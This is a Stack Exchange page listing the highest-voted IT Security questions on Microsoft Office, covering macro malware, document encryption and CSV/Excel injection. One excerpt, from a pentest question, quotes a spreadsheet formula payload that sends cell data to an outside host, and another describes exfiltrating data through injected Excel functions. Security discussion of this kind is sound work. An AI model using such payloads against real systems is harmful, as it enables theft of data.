Highest Voted 'office' Questions - IT Security Stack Exchange

18

votes

4 answers

Microsoft Word to secure stored data

I understand the purpose of Microsoft Word is not to store secret information. However, I would rather spread my secret information between a Password Manager and a Word document, each of which has separate secure passwords. Is a password-protected…

encryption office secrets-management

asked Dec 06 '20 at 22:57

EML

809
5
11

11

votes

3 answers

How can I safely view the code of a VBA macro?

I have received a phishing email with the usual bogus bill in the form of a Word document. I am curious about what the probable virus wants to do so I would like to inspect the code. At the moment Word opens the docx in protected mode, and I am…

virus phishing office

asked Apr 21 '16 at 08:58

David Glickman

1,344
1
9
17

9

votes

2 answers

Does "=cmd" CSV injection still exist in 2020?

I'm currently pentesting a web application on which a user can generate a CSV. I managed to exfiltrate data via CSV injection using a payload such as: =WEBSERVICE(CONCAT("http://example.com/", CONCAT(A1:A50)) I am now trying to create a "more…

windows injection office excel

asked Feb 14 '20 at 11:04

Scaum

271
2
7

7

votes

4 answers

How can I decrypt a Word document that I know the password to without opening it in a word processor?

I got a question that I thought would be simple but it is proving to be more difficult that I thought it would be. I got a malicious password protected Word document that I want to analyze for IoCs. It is encrypted so all I can see is…

malware decryption office

asked May 17 '17 at 16:39

user148614

73
1
1
5

6

votes

1 answer

External command execution in Excel formulas

It's known that MS Excel functionality of external references will allow executing arbitrary commands from its formulas with appropriate security warnings and confirmation required from the user. E.g. having a cell in excel sheet (or csv file opened…

vulnerability office excel

asked Jan 30 '18 at 18:08

Peteris

8,369
1
26
35

6

votes

2 answers

Excel 2007 Encryption Strength

With a strong password of 10+ characters, mixed case, etc... is the encryption of an Excel 2007 document secure enough to create reasonably strong defense against a brute force attack? What encryption method does Excel 2007 employ?

encryption passwords file-encryption office excel

asked Jul 26 '12 at 15:22

v15

1,741
4
16
18

6

votes

2 answers

Can Google Docs be used to “sanitize” a Word or Excel document?

Sometimes I have to download some Word or Excel documents from uncredible sites. I need not only to read but also to edit them. I heard that the Microsoft Office suite is a very popular attack vector. Although I patch my Windows and Office regularly…

zero-day microsoft office google-apps

asked Oct 31 '16 at 08:43

user129187

5

votes

5 answers

Is there a simple and highly secure office suite?

I am designing a highly restricted workstation build for a secure environment. At the minute this is planned to use Windows 7, but I am considering Linux. The users will on occasion open documents from external sources, and I need there should be…

apt office

asked Oct 09 '13 at 14:16

paj28

32,736
8
92
130

5

votes

1 answer

Identify if a certain domain is using Office 365 or Google Mail

I have a list of e-mail domains that i wanted to confirm if they're using Office 365 or Google Mail for mail. Checking MX using Nslookup can do the job but I noted that a few companies will use an anti spam service as their DNS MX and then redirect…

email cloud-computing gmail office

asked Jun 20 '16 at 19:50

Frosa

123
1
1
6

4

votes

1 answer

Exfiltrate data by injecting functions in Excel 2007 file rendered with PHP

I need to extract data from inside an Excel fille using Excel 2007 functions. The concept is somewhat related to stored XSS type of data exfiltration only that I need to use Excel 2007 functions (which I managed to inject in the file cells) in…

injection office exfiltration excel

asked Apr 16 '18 at 11:26

Lucian Nitescu

1,802
1
13
27

4

votes

1 answer

How should I approach my security team regarding aggressive group policies (VBA / macro blocking)?

My security organization has responded to the threat of macro-based viruses by changing all copies of Excel to no longer run macros/VBA scripts. Through some quick research, it looks like there are many valid alternatives to the "brute orce"…

corporate-policy office

asked Mar 20 '18 at 09:17

Ian McKechnie

41
2

4

votes

2 answers

Security Alert - Office File Validation - how to decide whether to proceed?

Recently, when opening a Microsoft Word document that came from a trusted source, I received the following warning message: The warning message is titled "Security Alert - Office File Validation". It says "WARNING: Office File Validation detected…

malware office usability

asked Aug 01 '12 at 07:09

D.W.

98,420
30
267
572

4

votes

2 answers

Server side Excel file security

I need to write an application that will interact with files uploaded from untrusted sources (users). Specs say I must support CSV and Excel. If I allow a user to upload an Excel file to the server and handle opening, processing and saving the file…

webserver file-upload office

asked Jun 20 '16 at 22:28

cocogorilla

149
3

3

votes

5 answers

Password protect an excel file for a period of time?

I'm trying to find a way to password protect an Excel file (.xlsm) beyond the built-in password encryption options. Ideally: Enter the password File works for a week(/other period of time) After a week, file requires password again The file is…

encryption passwords timestamp office

asked Jul 01 '14 at 16:50

MotS

33
1
3

3

votes

1 answer

Why aren't Microsoft Office macros sandboxed?

For about 20+ years now, Microsoft Office macros have been used to spread malware. Even in recent years those threats have not disappeared and they often resurface in one form or another e.g. World’s most destructive botnet returns with stolen…

malware sandbox office

asked Sep 20 '20 at 18:17

Henrique Jung

307
1
9

Questions tagged [office]